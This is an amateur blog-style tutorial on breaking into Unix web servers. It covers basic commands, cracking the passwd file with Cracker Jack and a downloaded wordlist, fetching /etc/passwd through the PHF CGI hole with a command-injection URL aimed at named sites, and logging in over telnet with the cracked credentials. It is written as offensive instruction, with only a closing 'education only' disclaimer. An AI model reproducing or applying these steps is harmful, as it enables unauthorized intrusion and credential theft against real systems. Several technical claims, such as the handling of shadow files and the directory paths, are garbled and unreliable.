web server hacking

               Is there any way to hack internet server? This question arises in mind of every newbie hacker, and my answer is yes. In fact there are many ways to hack a web server, here this article will discuss a few of them. As this is a little high level tech. so I assume that all you reading this are having basic knowledge of how web server works and a basic of UNIX commands. I will tell only the high level things which many of you don’t know. Let me divide this process in different parts to make it easier.

Part 1: UNIX commands

DOS commands and UNIX commands are very much similar, I am listing some basic commands that you will need to use a shell acc.

Help= Help

CP= Copy

MV= Move

LS= Dir

RM= Delete

CD= CD

To see who else is on the system you can type WHO. To get information about a specific user on the system type FINGER <username>. Using those basic UNIX commands you can learn all you need to know about the system you are using.

Part 2: Cracking password

File containing passwords is in the \etc directory on UNIX system. The file name is ‘passwd’. No, only reaching to passwd file in \etc directory doesn’t makes you a hacker, because all the password in this file are encrypted. And again if you know about decrypting, then also you can’t do this so easily that is because they all are one-way encrypted- that means there is no way to decrypt them. We need to use some programs to get passwords from that file and the best program I suggest will be “Cracker Jack”. You can get this program from the link given below:

http://linux.softpedia.com/progDownload/crackerjack-Download-36439.html

Now you need to get a wordlist, for that just browse the below link and download the top most file:  dic-0294.tar.Z

http://lists.pld-linux.org/mailman/pipermail/pld-cvs-commit/Week-of-Mon-20110613/313886.html

You need to uncompress it before using it. After uncompressing it, it is best to put it in the same directory as your cracking program. Also you can search for a tutorial on how to use Cracker Jack.

Part 3: Finding password files

The most important and difficult part of hacking server is ‘finding password’. If a file containing passwords is stored in your system then it is common sense that it’s not going to give it to you so easily. We have two ways to get done this work. Often the directory \etc id not blocked from ftp. First way is so simple, just run the program Cracker Jack on it, it will give you the desired thing. If it is restricted then you will need to try the way 2. There is a file called PHF on some systems in \cgi-bin directory. If it is there you are lucky. PHF allows you to gain access remotely to files over the world wide web.

For this method go to url bar and type “your website/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd”

For hint you can try www.spawn.com or www.garply.com

If the preceding to methods fail then try any way you can think of to get that file. If you do get the file and all the items in the second field are X or ! or * then the password file is shadowed. Shadowing is just a method of adding extra security to prevent hackers and other unwanted people from using the password file. Unfortunately there is no way to "unshadow" a password file but sometimes there are backup password files that aren't shadowed. Try looking for files such as /etc/shadow and other stuff like that.

Part 4: Logging into a new shell

Run your telnet client and then telnet to your server which you cracked, like www.spawn.com After you get connected you will see a screen asking for username and password, enter all the information you gathered during Part 2 and Part3. Now you can do whatever you like to do. Don’t try to use this tutorial for spreading virus and harming others, this article is strictly for education and knowledge purpose only.